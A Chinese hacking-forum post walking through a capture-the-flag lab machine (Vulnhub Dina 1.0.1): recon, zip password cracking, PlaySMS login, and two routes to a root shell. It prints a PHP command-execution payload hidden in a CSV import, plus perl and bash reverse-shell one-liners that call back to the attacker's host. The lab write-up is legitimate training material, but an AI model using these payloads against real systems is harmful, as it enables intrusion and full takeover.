跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

靶机渗透测试

CNHAT
CNHAT
CTF&密码学与社会工程

精选回复

发布于

靶机渗透测试(Dina: 1.0.1):

Vulnhub靶机 Dina: 1.0.1
靶机:修改靶机的网络配置为桥接模式。
攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。
靶机难度:(Beginner (IF YOU STUCK ANYwhere PM me for HINT, But I don’t think need any help).)
描述:/root/flag.txt

渗透流程:

1. 探测靶机ip地址(netdiscover -i eth0 -r 网关)

命令:netdiscover -i eth0 -r 192.168.10.0

靶机ip为: 192.168.10.133
在这里插入图片描述

2. nmap进行靶机端口服务扫描

命令: nmap -sS -Pn -A -p- -n 192.168.10.133

靶机只开放了80/http端口服务!(且存在robots目录)
在这里插入图片描述

3. 根据端口服务进行信息收集(80/http端口)

访问80页面进行信息收集:

在这里插入图片描述
3.1. dirb目录扫描

我们使用kali中的dirb工具,对靶机页面进行目录扫描,可以看到爆破出来了敏感目录,例如:robots、tmp、uploads

在这里插入图片描述

我们首先访问robots页面,可以看到不被允许访问的页面有5项:

在这里插入图片描述
逐一访问页面,在nothing页面,看到不同(not found):

在这里插入图片描述

ctrl+u查看一波源代码:得到一份密码本(5个字符串)(备份保存)

在这里插入图片描述

3.2. 访问/secure页面(访问非空目录)

继续访问其他敏感目录,在/secure页面得到一项zip文件:

在这里插入图片描述

我们使用kali下载下来,但解压时发现需要密码,这时刚刚nothing页面得到的密码本就可以排上用场了,我们使用密码本爆破,得到密码:freedom

在这里插入图片描述

成功解压,发现文件是mp3文件,但文件已经损坏,无法播放!!!

在这里插入图片描述

我们直接使用记事本打开(或者kali终端直接cat查看),在MP3文件中得到一项url地址:/SecreTSMSgatwayLogin(且给出了账号为touhid)

在这里插入图片描述

4. 信息收集(Playsms框架)

访问得到的url地址:(可以看到为Playsms框架)

用户名/密码: touhid /// diana
密码仍然为使用密码本爆破

登陆成功!

在这里插入图片描述
我们使用kali直接先search一波,查看下框架版本信息:
searchsploit playsms:

在这里插入图片描述
cat查看42044.txt文件,按照文档说明,我们可以生成一个csv文件,抓包传参;文档中给出了上传的脚本和信息,可以在user-agent中执行命令;

在这里插入图片描述
那么我们就可以在playsms框架上寻找到可以upload(文件上传)的地址,上传CSV文件,利用burp抓包修改参数,从而getshell;

5. Getshell(漏洞利用)

方式一. exp漏洞利用

使用msf查看框架漏洞:
打开msf:
search playsms:

在这里插入图片描述

show options 查看配置信息
使用set命令设置配置信息:

set PASSWORD diana
set USERNAME touhid
set TARGETURI SecreTSMSgatwayLogin (TARGETURI是上传文件页面的URI)
set RHOST 192.168.10.133(靶机ip)
set LHOST 192.168.10.9(kali监听机的ip)
set LPORT 1234(kali监听的端口)

在这里插入图片描述

成功获得meterpreter,输入shell:

在这里插入图片描述
使用sudo -l命令查看可提权文件,发现可以执行perl命令,(所有用户均可以执行)
通过perl写入反向shell语句,命令如下:

sudo perl -e ‘use Socket; i = " 192.168.10.9 " ; i="192.168.10.9"; i="192.168.10.9";p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in( p , i n e t a t o n ( p,inet_aton( p,inetaton(i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’

在这里插入图片描述

因为我们前面在得到meterpreter时,已经监听了4444端口,所以本次不能再重复使用,否则会报错4444端口已经被占用!

在这里插入图片描述

nc监听1234端口,成功获取到目标机器shell,whoami查看为root管理员权限,进行root/flag.txt查看:得到flag。
实验成功!!!

在这里插入图片描述
方式二 . 利用漏洞建立反弹shell(命令执行漏洞)

查看Import File的漏洞文档,发现文档中给出了利用方法:

需要在导入的 CSV 文件中填入以下内容:

name:<?php $t=$_SERVER['HTTP_USER_AGENT']; system($t); ?>
mobile:22

此时导入该 CSV文件,抓包修改User-Agent的值为任意命令,即可执行。

Phonebook板块有一个导入文件并识别CSV文件内容的功能,即导入一个测试文件,页面会回显文件内容:

在这里插入图片描述

在这里插入图片描述

导入csv文件,然后抓包,尝试修改User-Agent,结果会返回执行结果:

在这里插入图片描述
当然我们也可以直接修改NAME值,然后直接键入php提权命令:
在这里插入图片描述

因此我们就可以建立反弹shell并提权:
修改User-Agent为创建反弹shell的命令:

echo ‘bash -i>&/dev/tcp/192.168.10.9/1234 0>&1’ | bash

kali上监听1234端口,再次发包即可得到getshell;

成功反弹shell!!!(提权部分与上文相同,也可以使用脏牛提权,靶机下载dirty.c脚本,gcc编译,修改passwd文件,切换用户,成功提权!)

在这里插入图片描述

实验总结:

在本次实验中信息搜集得到仅开放的80端口,以及对robots协议的了解和robots目录下的不被允许访问的目录;

访问robots文件得到密码本,为后续解开mp3压缩包文件提供了很有利的帮助,在MP3文件损坏后,及时使用记事本查看,得到了playSMS登陆地址与用户名;

利用给出的用户名和robots文件中的密码进入系统,发现两处命令执行漏洞;

提权部分,我们可以使用手工利用和使用MSF利用漏洞,以及脏牛提权。

在实验中,CVS上传漏洞是本次的新颖知识!!!

参考博客:
https://blog.csdn.net/qq_43968080/article/details/105351336

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。